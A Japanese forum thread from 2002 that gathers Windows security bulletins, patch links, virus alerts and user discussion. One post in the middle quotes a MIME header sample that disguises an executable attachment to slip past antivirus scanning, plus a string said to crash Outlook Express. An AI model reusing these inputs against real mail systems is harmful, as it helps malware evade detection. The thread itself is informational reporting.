【Windows】セキュリティ情報総合スレッド

このエントリーをはてなブックマークに追加
1 ◆MUMUMU4w
Windows関連のセキュリティ関連情報、パッチリリース情報等を取り扱います。
2 ◆MUMUMU4w :02/02/28 14:02 ID:PWv2RBno
とりあえず今日届いたものを掲載しておきます。

--- cut ---
最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-012ov.asp

MS02-012 に関する情報
「MS02-012: 不正なデータ送信リクエストにより SMTP クライアントが
Windows SMTP サービスに不正なコマンドを送信する」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
この問題により、メールの送受信を妨害することが可能です。


対象となる製品
==============
・ Microsoft Windows 2000
・ Microsoft Windows XP Professional
・ Microsoft Exchange 2000


修正プログラム
==============
・ Microsoft Windows 2000 (PC/AT 互換機)
http://download.microsoft.com/download/win2000platform/Patch/Q313450/NT5/JA/Q313450_W2K_SP3_X86_JA.exe
・ Microsoft Windows 2000 (NEC PC-9800シリーズ)
http://download.microsoft.com/download/win2000platform/PatchNEC/Q313450/NT5/JA/Q313450_W2K_SP3_nec98_JA.exe
・ Microsoft Windows XP Professional
http://download.microsoft.com/download/whistler/Patch/Q313450/WXP/EN-US/Q313450_WXP_SP1_x86_ENU.exe
Microsoft Exchange 2000 をご利用の方は Windows 2000 の修正プログラムを
適用してください。
Windows 2000 の修正プログラムは MS02-011 と同じものです。


回避策
======
Windows 2000 Serverおよび Advanced Server では、SMTP サービスは、標準
でインストールされます。
使用しない SMTP サービスがインストールされている場合は、システムからア
ンインストールするか、サービスを無効にすることをお勧めいたします。
3 ◆MUMUMU4w :02/02/28 19:37 ID:HroRek0q
>>2
日本語修正プログラムが出ましたので掲載しておきます。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
・ Windows 2000 Server, Professional および Advanced Server
- PC/AT 互換機用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=36607
- NEC PC-9800 シリーズ用 :
http://www.microsoft.com/downloads/release.asp?ReleaseID=36616

・ Windows XP Professional:
http://www.microsoft.com/downloads/release.asp?ReleaseID=36693
4 ◆MUMUMU4w :02/02/28 19:49 ID:HroRek0q
これはちょっと古いやつですが、本日日本語KBが公開されたので、一応。

今回の更新内容
この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp
==================================================

Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る (MS02-009)

登録日 : 2002/2/22
更新日 : 2002/2/28

概要 :

このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Explorer を使用しているお客様

脆弱性の影響 : 情報の漏えい

最大深刻度 : 高

推奨する対応策 : Internet Explorer を使用しているお客様は修正プログラムを
適用してください。

影響を受けるソフトウェア :
・ Microsoft Internet Explorer 5.01
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 6

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。

http://www.microsoft.com/windows/ie/downloads/critical/q318089/default.asp
ダウンロード先のリストから Japanese を選択してください。
5名無しさん@お腹いっぱい。:02/02/28 19:55 ID:q1MXLVtp
一応良スレ
6 ◆MUMUMU4w :02/03/04 19:53 ID:cG0eJ+rt
■IE5.5/6.0に任意のプログラムが実行できるセキュリティーホール。

XMLの機能でActivX切ろうが何しようがHTMLを読み込んだ時点でローカルなプログラムを
実行可能な模様。回避方法は今のところレジストリをいじってこのような警告を出すのみ。
「HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0」の1004のDWORD
値を16進数で「0x3」に変える事で警告を出すことが出来ます。副作用は不明。
ちょっとお茶目すぎるっぽいのでレジストリいじりたくないよーって人はIEの使用は控えて
パッチを待つことをお勧めします。

ソース: http://techside.net/
元記事(英語): http://security.greymagic.com/adv/gm001-ie/
7名無しさん@お腹いっぱい。:02/03/04 19:59 ID:nZIxQolk
むむむ。
8名無しさん@お腹いっぱい。:02/03/04 20:02 ID:???
むむむむ。
9名無しさん@お腹いっぱい。:02/03/04 20:35 ID:G2c/4MhG
もう、パッチ当てんのめんどい。。。
10名無しウイルス@お腹いっぱい。:02/03/04 21:00 ID:cMuLVZNk
>>9
分る、分るよー
11名無しさん@お腹いっぱい。:02/03/04 21:14 ID:44NSrVDU
自動的に更新を見つけて自動にダウンロードして自動インストール
するプログラムないかな?
12名無しさん@お腹いっぱい。:02/03/04 21:21 ID:???
何気に良スレ
13名無しさん@お腹いっぱい。:02/03/04 21:28 ID:wfNG7iPD
>>11
自動でウイルスをインストールしそう。。。
14名無しさん@お腹いっぱい。:02/03/04 21:37 ID:???
>>13
なら自動で更新見つけて自動でウィルススキャンして自動でインスト
する機能はないかな?

マイクロソフトからダウン・インストするんだからウィルスに引っかかる
なんて事ありえんのですか?
15名無しさん@お腹いっぱい。:02/03/04 21:44 ID:LDUHKym8
16名無しさん@お腹いっぱい。:02/03/04 21:51 ID:???
>>15
ありがとうございます。でも自分は初心者なんで何がなんだかさっぱり
です。
17名無しさん@お腹いっぱい。:02/03/04 21:51 ID:jGGvU+Hs
Windowsとセキュリティは共存できません。
Windowsをアンインストールして
セキュリティをインストールしてください
18名無しさん@お腹いっぱい。:02/03/04 22:03 ID:???
>>17
セキュリティて市販ソフトの事ですか?すいません逝ってきます。
19login:Penguin:02/03/04 22:25 ID:hYVRCX26
逝ってらっしゃい
20pen2:02/03/05 00:21 ID:vjHya2Lb
富士通子会社が吊るし上げ
http://www.bnn-s.com/bnn/bnnTopics?news_cd=220011023681
21 ◆MUMUMU4w :02/03/05 13:01 ID:xgHHXFS6
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp

MS02-013 に関する情報
「MS02-013: Java アプレットがブラウザ トラフィックをリダイレクトする」
に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。


概要
====
この問題により、ブラウザで送受信される情報を盗聴されることがござい
ます。


対象となる製品
==============
・ Microsoft virtual machine (Microsoft VM) ビルド 3802 を含む、
それ以前のビルド全て

注意: Microsoft VM は Windows や Internet Explorer の一部として出荷さ
れているほかに、Web サイトから新しいバージョンをダウンロードすることも
できます。また、Microsoft VM は多くのアプリケーションの一部としても出
荷されています。そのため、必ず、以下の手順で、ビルド番号を確認してくだ
さい。

Microsoft VM の ビルド番号は次の手順で確認します。

1. コマンド プロンプトを起動します。

・ Windows 9x/Me
[スタート] - [ファイル名を指定して実行]を選択し、 command と入力
し[OK]をクリックします。

・ Windows NT/2000/XP
[スタート] - [ファイル名を指定して実行]を選択し、 cmd と入力し
[OK]をクリックします。

2. jview を実行します。

C:>jview

3. 実行すると、以下の結果が表示されます。
赤色の部分がビルド番号になります。

Microsoft (R) Command-line Loader for Java Version 5.00.3802
Copyright (C) Microsoft Corp 1996-2000. All rights reserved.


修正プログラム
==============
Windows 9x/Me/NT 4.0/XP 用
~~~~~~~~~~~~~~~~~~~~~~~~~~
・ Microsoft VM
http://download.microsoft.com/download/vm/Install/3805/W9XNT4MeXP/EN-US/msjavx86.exe

Windows 2000 用
~~~~~~~~~~~~~~~
Windows 2000 用の修正プログラムは現在準備中です。準備ができ次第、この
ページにて、お知らせします。
22 ◆MUMUMU4w :02/03/05 13:05 ID:xgHHXFS6
■XP HomeからProへのアップグレードでセキュリティ修正プログラムおよび
 修正モジュールが移行されないとマイクロソフトが公表

 マイクロソフトは3月1日より,Windows XP Home EditionをXP Professionalへアップ
グレードするためのパッケージ「Windows XP Professionalステップアップグレード」の
発売を開始している。同社はサイトで,このステップアップグレード使用時の注意点を
公表し,一部のファイルが失われるという。

 注意点の1つは「スタートメニューのショートカットや,スタートアップグループのアイテム,
共有ドキュメントの中に含まれる文書,画像,音楽ファイルなどが失われる可能性がある」
(該当サイト)というもの。もう1つは,「セキュリティ修正プログラムおよび修正モジュールが
移行されない」(該当サイト)というもの。これらの回避方法については,該当サイトに手順が
示されているが,後者に関しては修正プログラムおよび修正モジュールを再度インストール
することを求めている。

ソース: http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020305/1/
23名無しさん@お腹いっぱい。:02/03/05 13:22 ID:AyT1K1Vk
良スレ。お気に入り決定。
>>◆MUMUMU4w
頑張ってください。
24名無しさん@お腹いっぱい。:02/03/05 13:55 ID:/PsNtWjZ
>>◆MUMUMU4w
素人がでしゃばった真似をするな、
すっこんでろ。
25 ◆MUMUMU4w :02/03/05 14:26 ID:Pswl2OOi
>>23
どうも。お役に立てば幸い。

>>24
はい。素人なので単に得た情報を掲載するだけです。
各情報の取り扱いについてはみなさんにお任せします。
26名無しさん@お腹いっぱい。:02/03/06 15:23 ID:JSGEasEm
マイクロソフトは、同社のJavaVMにセキュリティホールが発見されたと発表した。
インターネットへのアクセスにプロキシサーバーを利用する環境では、
Webサーバーとのやりとりを意図しないサーバーへリダイレクトされる可能性がある。
すでにこの問題を解決したJavaVMが公開されており、マイクロソフトは適用を強く
推奨している。

対象となるJavaVMのバージョンはMicrosoft VM Build 3802まで。
Microsoft VMは、Windows XP/Me/98/95/2000/NT4.0で動作するほか、
Windows Me/98/2000やInternet Explorer(IE)5.5およびそれ以前
のバージョンには標準で含まれている。

Java アプレットがブラウザ トラフィックをリダイレクトする(マイクロソフト)
http://www.microsoft.com/japan/technet/security/current.asp

Microsoft VM build 3805(英文、ダウンロードできる)
http://www.microsoft.com/java/vm/dl_vm40.htm

マイクロソフト
http://www.microsoft.com/japan/

ソース
http://www.watch.impress.co.jp/broadband/news/2002/03/06/java.htm


2 名前:名無しさん@お腹いっぱい。 投稿日:02/03/06 15:02 ID:Rh20D3k7
2

27名無しさん@お腹いっぱい。:02/03/06 17:01 ID:2CtenHly
セキュリティなら欠かさずIEやWinの修正パッチを当てて
セキュソフを入れてルーターを入れればいいよ!てか、個人
でできる事なんざそれくらいしかないだろうし。
28名無しさん@お腹いっぱい。:02/03/06 22:19 ID:Nf2ClEbB
>27
実際は何も知らないでインターネット接続している人多いと思うけどね。
29名無しさん@お腹いっぱい。:02/03/06 22:43 ID:CQ/KMIPQ
IE使っちゃだめだよ。
>>6の問題未解決だから。
へたするとHDフォーマットまでされちゃうぞ!

電卓が起動するデモ(NT用)
http://security.greymagic.com/adv/gm001-ie/simplebind.html
ソース見てみ
30151:02/03/06 22:48 ID:tD+oYjUs
>>28
マジでそんあに多いのですか?俺は初めてこのパソ買うときは
セキュリティ系の雑誌読みまくって準備していたけど
>>29
ならoperaでも使います?
3129じゃないけど。:02/03/06 22:50 ID:???
>>30
ネスケにしたよ・・・
3229:02/03/06 23:18 ID:CQ/KMIPQ
operaにしたよ
6.0は不安定だったけど、6.01になったら安定して
重宝してます。
時々、表示フォントが48ポイントになってビビるけど。
33名無しさん@お腹いっぱい。:02/03/06 23:27 ID:REwUzRQW
34名無しさん@お腹いっぱい。:02/03/06 23:41 ID:FReTYene
オペラはそこそこ使えるよ
金出してまで使う気は起きないけれど,無料版で十分使える
日本語化パッチも出てるし
OSとは離れているからセキュリティーの問題もそれほどないみたい
どう?
35名無しさん@お腹いっぱい。:02/03/06 23:45 ID:???
>>34
Windows UpdateやLive Updateみたいに
半自動でアップデートできるなら少しは考える
あと、ブックマークの汎用性も気になるな
36名無しさん@お腹いっぱい。:02/03/07 22:20 ID:???
age
37名無しさん@お腹いっぱい。:02/03/07 22:20 ID:cBmAGEoE
「ネット掲示板ユーザー、吉野家に殺到?」

22日、牛丼外食チェーンの最大手、吉野家ディー・アンド・シー
(安部修二社長、本社=東京)の複数の店舗に、インターネット
上の掲示板“2ちゃんねる”のユーザーたちがつめかけ、ちょっと
した騒動になった。“2ちゃんねる”は国内最大規模のインターネ
ット掲示板で、ユーザー数は500万とも800万ともいわれる。

この掲示板で何者かが匿名で、「2002年2月22日は2ちゃん
ねるの日」としたうえで「22時に最寄りの吉野家に集合」するよ
う呼びかけたのが事の発端。同掲示板ユーザーの“目印”として「大
盛ねぎだく玉(ぎょく)」と注文するよう働きかけていた(「ねぎ
だく」とは耳慣れない言葉だが「ねぎが多め」を意味し、「玉(ぎ
ょく)」はもちろん玉子である)。同掲示板では、これに参加を表
明する者も多く、事態を重くみた吉野家は「主要店舗で通常の1.5
〜2倍量のねぎと玉子をあらかじめ仕入れて対応した」(吉野家広
報部)。午後10時過ぎには行列のできはじめる店舗もあり、東京
の新宿東口靖国通り店でも「大盛ねぎだく玉」の注文があいついだ。
その多くは男性客だったが、この時間帯には珍しく親子連れの姿も
ちらほら見受けられた。店員たちが忙しく、その「特殊な」注文の
対応に追われていた。

しかしなぜ“吉野家”なのか。それは、同掲示板ユーザーのあいだ
で一番の人気を誇る外食チェーンであるためと専門家は分析する。
昨年夏ごろから、吉野家の常連客を装った「怪文書」が複数の掲示
板に書き込まれるなどの出来事もあり、話題になっていた。
38名無しさん@お腹いっぱい。:02/03/07 22:51 ID:Lf0Pz569
>>37
どこそれ?
39 ◆MUMUMU4w :02/03/07 22:52 ID:TX//k/45
■NetscapeやSunの「JVM」に「盗み見」のセキュリティホール

■URL
http://home.netscape.com/security/
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/216&type=0&nav=sec.sba
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-013

 米Netscape Communicationsは同社のセキュリティ情報サイトで、米Sun Microsystemsの
「Java Virtual Machine」(JVM)と、Webブラウザー用の「JVM plug-in」にセキュリティホールが
見つかったと警告した。

 これは、米Microsoftが4日に報告したJVMのセキュリティホールと同様の問題で、攻撃者が
Javaアプレットを使って、Webブラウザーとプロキシーサーバーとの通信を盗聴可能になると
いうもの。これを悪用して、ユーザー名やパスワードなどの機密情報を盗聴される危険性が
ある。

 この問題の影響を受けるのは、「Netscape Communicator」と「Netscape」のバージョン
6.0/6.01/6.1。Sunの新しい「JVM plug-in」を搭載したバージョン6.2と6.2.1はこの問題の
影響を受けないため、旧バージョンのユーザーは最新版にアップグレードするよう呼びかけて
いる。

ソース: http://www.watch.impress.co.jp/internet/www/article/2002/0307/jvm.htm

Microsoftと同じ問題が(古い)Sun JVMにも存在していたようです。
40名無しさん@お腹いっぱい。:02/03/08 03:31 ID:eLAuQfqu
>>33のパッチのq316059.exeって前にも出てなかった?
俺のには2/14に同じ名前のファイル落してるけど同じモノ
かな?
でもサイトに3/6更新って書いてるし、更にまた修正したのかな?
つか分りにくいんだよ。このサイト
41名無しさん@お腹いっぱい。:02/03/08 04:57 ID:???
>>40
激しく同意。
問題点とパッチが複雑に絡み合ってて、結局何をどうすればいいのかが
分かりにくい。
42 ◆MUMUMU4w :02/03/08 05:32 ID:ptGlujz6
>>40
これについては、少なくともIE6のパッチの大きさ、チェックサムともに変わってませんでした。

確かに、Microsoftはたまに「サイレントアップデート」と称して、パッチ番号が変わらないのに
パッチ自体が更新されることがあるので、要注意です。
43 ◆MUMUMU4w :02/03/08 12:08 ID:JWPpQBHG
http://www.microsoft.com/japan/technet/security/bulletin/ms02-014ov.asp
MS02-014 に関する情報

「MS02-014: Windows Shell の未チェックのバッファにより、コードが実行される」に関する
要約情報です。セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
この問題により、未チェックのバッファにより、不正なプログラムが実行される可能性がある
問題です。最悪の場合、悪意のあるユーザーが攻撃の対象となるシステムで、任意の
プログラムを実行することが可能になります。

対象となる製品

Microsoft Windows 2000
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 98 Second Edition
Microsoft Windows 98

修正プログラム
Microsoft Windows 2000 (PC/AT 互換機)
http://download.microsoft.com/download/win2000platform/Patch/Q313829/NT5/JA/Q313829_W2K_SP3_X86_JA.exe

Microsoft Windows 2000 (NEC PC-9800シリーズ)
http://download.microsoft.com/download/win2000platform/PatchNEC/Q313829/NT5/JA/Q313829_W2K_SP3_nec98_JA.exe

Microsoft Windows NT 4.0 アクティブデスクトップ使用環境 (PC/AT 互換機)
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

注意:この修正プログラムは、Internet Explorer 4.0 の アクティブデスクトップを利用している方
のみ適用してください。

Windows NT 4.0(アクティブデスクトップを使用していない環境用)、Windows 98 および
Windows 98 Second Edition の日本語版修正モジュールは、現在準備中です。準備が
でき次第、このページにて、お知らせします。

詳細
この問題を利用して、下記の攻撃が考えられます。

悪意のあるユーザーが、未チェックのバッファを利用して任意のプログラムを実行することが
可能です。対策が行われていないシステムがインターネットなどのネットワークを通じて他の
コンピュータと接続している場合、この問題を利用した悪影響を受けることがあります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、ワームといった
自動的な攻撃を目的とした悪意のあるプログラムから行われることがあります。
上記の攻撃を受けることにより以下のような実害を受ける可能性があります。

・新しいソフトウェアのインストール (通常は悪意のあるプログラム)
・ハードディスクのフォーマット
・他のシステムを攻撃するための利用
・Windows の異常停止

日本語による詳細については、ただいま準備中です。
それまでの間、英語情報をご参照ください。

MS02-014: Unchecked Buffer in Windows Shell Could Lead to Code Execution1
44名無しさん@お腹いっぱい。:02/03/08 17:07 ID:YJh406Bh
MSのセキュリティサービスから妙な文字化けメールが来たのは俺だけだろうか
45名無しさん@お腹いっぱい。:02/03/08 17:22 ID:???
お詫びとご案内 : プロダクト セキュリティ 警告サービス にご登録のお客様に本情報が公開されたことをメールにて送付いたしましたが、
送付いたしましたメールが正常に読めない状態で配信されました。プロダクト セキュリティ 警告サービスをご利用のお客様に、
多大なるご迷惑をおかけいたしましたこと深くお詫び申し上げます。
現在、原因を調査しております。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-014ov.asp
46 ◆MUMUMU4w :02/03/08 17:24 ID:???
>>44 >>45
この文字化けメールの内容が >>43 です。
47名無しさん@お腹いっぱい。:02/03/08 19:41 ID:rYv0y7qB
48 ◆MUMUMU4w :02/03/09 01:39 ID:OoXINnKA
既にSlashdot等には情報が出ていますが、一応ここにも貼っておきます。
そもそもメールでこういうファイルは送られて来ない。

■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━

● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。
--------------------------------
差出人: Microsoft Corporation Security Center [[email protected]]
または送信者のアドレス
宛先:Microsoft Customer
または受信者のアドレス
件名: Check It Out - Microsoft Security Update
など4種類から無作為に選択
本文: Microsoft Customer,this is the latest version of security update
で始まる長文。内容はセキュリティホールの説明と添付ファイルの使用方法。
添付ファイル名: q216309.exe
--------------------------------
※マイクロソフト社のセキュリティアップデートプログラムを装っています。

添付ファイルを実行すると以下のメッセージを表示し、ワーム活動とハッキ
ングツール活動を行います。
--------------------------------
This will install Security Update.

Do you wish to continue ?
[yes] [no]
--------------------------------
※yes、noのどちらを選択してもプログラムは続行されます。

<ワーム活動>
コンピュータ内に保存されているメールアドレス宛てに、上記のメールを送
信します。ウイルスコードにバグがあるため、表示名が設定されていたりサ
ブドメインがあるアドレスには送信しません。

<ハッキング活動>
Windowsフォルダにハッキングを行うためのプログラムを作成します。コン
ピュータ内の任意の情報を収集し、自力で通信ポートを開き外部へ情報を送
信します。

○予防対策:
不審な添付ファイルを実行しないようにしてください。マイクロソフトの修
正プログラムを装っているので十分ご注意ください。
トレンドマイクロ製品では、本ウイルスに対しウイルスパターンファイル
235以降で対応します。今後新たな亜種の発生も考えられるため、お使いの
製品のウイルスパターンファイルを最新のものに更新してください。

○「WORM_GIBE.A」を検出した場合:
1個のプログラムのため「ウイルス駆除」の処理は行えません。検出したフ
ァイルを削除してください。
すでにプログラムを実行し、システムの改変が行われた場合には、手動での
修復が必要になります。下記詳細情報の手動削除手順に従ってください。

○ WORM_GIBE.A 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GIBE.A
49名無しさん@お腹いっぱい。:02/03/09 09:00 ID:RN1yZy2S
>>47
w98の修正プログラムを入れるのは少し待った方が良いかも…

[ディスクのプロパテ]ィ[とファイル名を指定して実行]が文字化けします。

やっちゃったよ、俺…
50名無しさん@お腹いっぱい。:02/03/09 09:28 ID:???
訂正です
×[ディスクのプロパテ]ィ[とファイル名を指定して実行]
○[ディスクのプロパティ]と[ファイル名を指定して実行]
51名無しさん@お腹いっぱい。:02/03/09 10:43 ID:2tubuYZM
win98の日本語パッチを当ててしまい ブルーになっている皆さんも
当てずにすんで、ホットしている皆さんも
息抜きに、ちょっとした善行でもどうですか?

2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】
http://live.2ch.net/test/read.cgi/festival/1015607977/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
52 ◆MUMUMU4w :02/03/12 14:46 ID:bmm5xpxS
■マイクロソフト、Windows 98/NT 4.0/2000のセキュリティパッチを公開 --------
http://www.forest.impress.co.jp/article/2002/03/11/windowsbug.html

 マイクロソフト(株)は8日、Windows 98/NT 4.0/2000のWindows Shellにバッファ
オバーランによるセキュリティ問題があることを明らかにし、修正プログラムを公開
した。現在同社のホームページからWindows 2000用の修正プログラムが無償でダウン
ロードできる。なお同社では、今回のセキュリティ問題は非常に特別な状況下で発生
するものとして、セキュリティ問題の最大深刻度を“中”レベルに設定している。

 今回明らかにされた問題は、Windows 98/NT 4.0/2000でデスクトップのインターフェ
イスやファイルの管理機能などを提供している“Windows Shell”と呼ばれる部分の
一部でバッファオーバーランが生じる可能性があるというもの。通常の状態ではネッ
トワーク経由でこの問題を悪用することはできないが、特定の機能を備えたソフトを
アンインストールしようとして完全にアンインストールしきれなかった場合に限り、
HTMLページを通じて悪用されてしまう可能性があるという。今回の問題を悪用された
場合、悪意あるソフトを勝手にインストールされたり、ハードディスクをフォーマッ
トされてしまう危険性があるとのこと。

 なお同社では、8日の時点でWindows 2000用のほかに、Windows 98/NT 4.0用の修正プ
ログラムを公開したが、Windows 98/NT 4.0にこの修正プログラムを適用すると“ファ
イル名を指定して実行”などの一部のダイアログで文字化けが生じる不具合が見つか
り、11日深夜になって公開を中止した。同社によると、不具合を直した新しい修正プ
ログラムは現在開発中で、数日中に公開する予定だという。

□Windows Shellの未チェックのバッファにより、コードが実行される
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
□MS02-014 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/MS02-014ov.asp
53 ◆MUMUMU4w :02/03/12 22:06 ID:97C86/a/
CからZドライブを全て上書きするFinal Fantasyワーム

 アイ・ディフェンス・ジャパンからの情報によると、スクウェア社のFinal Fantasy VIIIのコピーを
装う、新種の大量メール送信型ワーム「Fintas」が発見された。Fintasが送信する電子メール
には添付ファイルが含まれる。この感染した添付ファイルを実行すると、Autoexec.batファイルが
上書きされ、コンピューター起動時にC:\からZ:\までの全てドライブを上書きするという指示が
書き込まれてしまうため、十分な注意が必要だ。

※この情報はアイ・ディフェンス・ジャパン
 ( http://www.idefense.co.jp/ )より提供いただいております。
 情報の内容は以下の時点におけるものです
 【18:48 GMT、03、11、2002】

(詳しくはScan および Scan Daily EXpress 本誌をご覧ください)
http://shop.vagabond.co.jp/m-ssw01.shtml
http://shop.vagabond.co.jp/m-sdx01.shtml(Scan)

ソース: http://headlines.yahoo.co.jp/hl?a=20020312-00000006-vgb-sci
54 :02/03/12 22:19 ID:/KeJxdM1
ハードディスク・フォーマッター ON!!
55 ◆MUMUMU4w :02/03/12 22:28 ID:97C86/a/
OCN、ウイルス情報をメルマガ配信

 NTTコミュニケーションズ(NTTコム)は11日より、インターネットに関するセキュリティ情報を
配信するメールマガジン「OCNセキュリティニュース」を開始した。コンピューターウイルスへの
対策の一環で、無料で利用できる。

 NTTコムのインターネット接続サービスOCNのサイトで会員登録されると、最新のセキュリティ
関連情報を隔週で定期配信するほか、要注意ウイルスが発生した場合は号外としてウイルス
情報をいちはやく届ける。インターネット初心者からブロードバンド環境利用者まで幅広い層が
対象で、OCNの会員以外でも利用可能だ。

[OCNセキュリティニュース]
http://www.ocn.ne.jp/secnews/

ソース: http://www.mainichi.co.jp/digital/network/archive/200203/12/4.html
56名無しさん@お腹いっぱい。:02/03/15 21:06 ID:5nyEJEJ/
【長かった ・・・本当に長かった不具合よ さらば!!】
MS02-014のパッチが再発行されたよ!!
http://www.microsoft.com/japan/technet/security/bulletin/MS02-014.asp


変更履歴
2002/3/8: このセキュリティ情報ページを公開しました。

2002/3/15: この問題に対する Windows NT 4.0 (Active Desktop 使用環境) および
Windows 98/98 Second Edition の日本語版修正プログラムを更新しました。
また、Windows NT 4.0 (Active Desktop を使用していない環境用) の日本語版修正
プログラムを公開しました。
57名無しさん@お腹いっぱい。:02/03/15 21:24 ID:???
>>56
あちこちに貼りすぎ。
ウザイよ。
58 :02/03/15 22:29 ID:???
各OSごと、頻繁にサービスパック出してくれ。。

MS、サイト構成わかりにくい上に、解説文書とかが難しすぎ。。。

新しい機能盛り込む前に、やることイッパイあるだろうが。。。。。。
59名無しさん@お腹いっぱい。:02/03/15 23:41 ID:???
>58
そんなことしたら不具合だらけのサービスパックになるだろうが(藁
一つ目は、.dbxまたは.nchに変更されたファイルが 検知できない問題。
二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。
三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、
ウイルスの検知動作がストップしてしまう問題。
これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが
検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、
トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。
SecurityFocus
Symantec Norton AntiVirus Conflicting MIME Header Vulnerability
http://online.securityfocus.com/bid/4246

SecurityFocus
Symantec Norton AntiVirus Excluded Filetype Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4245

SecurityFocus
Symantec Norton AntiVirus NULL Characters Incoming Email
Protection Bypass Vulnerability
http://online.securityfocus.com/bid/4242

SecurityFocus
Symantec Norton AntiVirus Non-RFC Compliant Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4243

SecuriTeam.com 2002/03/14 追加
Various Vulnerabilities in Norton Anti-Virus 2002
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html
http://homepage2.nifty.com/spw/secure/index.html
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html

Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"
特定の文字列でOE5がプレビュー時にハングアップ

以下のような文字列を含むメールを開く・プレビューするとOutlookExpressが固まります。
<" http://www.testtest.co.jp/ "@www.testtest.co.jp>

-----

>> http://japan.cnet.com/News/2001/Item/011120-3.html?mn
> セキュリティー会社がInternet Explorer(IE)のセキュリティーホールの詳細を
> 公開したことに対し、IEユーザーを危険に晒したと非難していた米マイクロソフトだが、
> 実は1週間前からその欠陥を知っており、修正パッチをリリースできずにいたことを認めた。

そういえば自分も今年の3月頃、特定の文字列がかかれたメールを
OutlookExpress5に送るとプレビュー時にハングアップすることを発見し、
マイクロソフトに送ったのに、今のOE6でも直ってない。

内部的にセキュリティーホールに繋がってるとまずいと思って、
公開してなかったけれど、時間的にもう十分だよね。

以下のような文字列を含むメールを開く・プレビューするとOutlookExpressが固まります。
<" http://www.testtest.co.jp/ "@www.testtest.co.jp>
(ここではhttpを大文字にしています。)

以下より転載
http://memo.st.ryukoku.ac.jp/archive/200111.month/1912.html
64名無しさん@お腹いっぱい。:02/03/16 14:21 ID:PhV8y9DA
>49
俺もやってしまった・・・
デスクトップのアイコンがマイコンピュータとネットワークとゴミ箱しか
表示されなくなって、英語表記だった。
スタート→プログラムのアプリも表示されなくなった。(エクスプローラではみえるけど)
で、昨日修正パッチが出たんでインストールしなおしたら治ったよ。
http://www.forest.impress.co.jp/article/2002/03/15/patchfor98nt40.html
65 ◆MUMUMU4w :02/03/19 01:19 ID:naXTlD7l
SNS Advisory No.48
Microsoft Internet Explorer 6 Still Download And Execute ANY Program Automatically

Problem first discovered: 13 Feb 2002
Published: 18 Mar 2002


--------------------------------------------------------------------------------

概要:

Microsoft Internet Explorer 6 には、さまざまな環境下においてユーザの意思に関係なく、
ファイルを自動的にダウンロードし、かつ、それを自動的に実行してしまう問題があります。
悪意ある Web サイトの管理者はこの問題を利用することのできる悪意あるコンテンツを設置し、
ユーザが Internet Explorer 6 を利用してこのコンテンツにアクセスした場合に、この管理者が
指定した任意のプログラムはユーザのシステム上に自動的にダウンロードされ、かつ、自動的に
実行されてしまう可能性があります。

問題を確認した バージョン:

Microsoft Internet Explorer 6 + 提供済みの全ての Hotfix

問題を確認した OS:

Windows 2000 Professional + SP2 + SRP1 + 提供済みの全ての Hotfix [日本語版]
Windows NT 4.0 Workstation + SP6a + 提供済みの全ての Hotfix [日本語版]
Windows 98 + Windows 98 System Update + 提供済みの全ての Hotfix [日本語版]

回避策:

[インターネットオプション]から適切なゾーンに対して[ファイルのダウンロード]を無効にすることで
この問題を回避することができます。

発見者:

新井悠 (LAC) [email protected]

ベンダのステータス:

2月13日にこの問題を Microsoft 社に報告しましたが、それから30日を過ぎてもこの問題を
回避するための手段ないし修正プログラムは同社より提供されることはありませんでした。
我々は多くのユーザがこの問題の影響を受けてしまうことを懸念し、脆弱性の存在について
公開することを決定しました。

免責:

このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、あるがままの形で
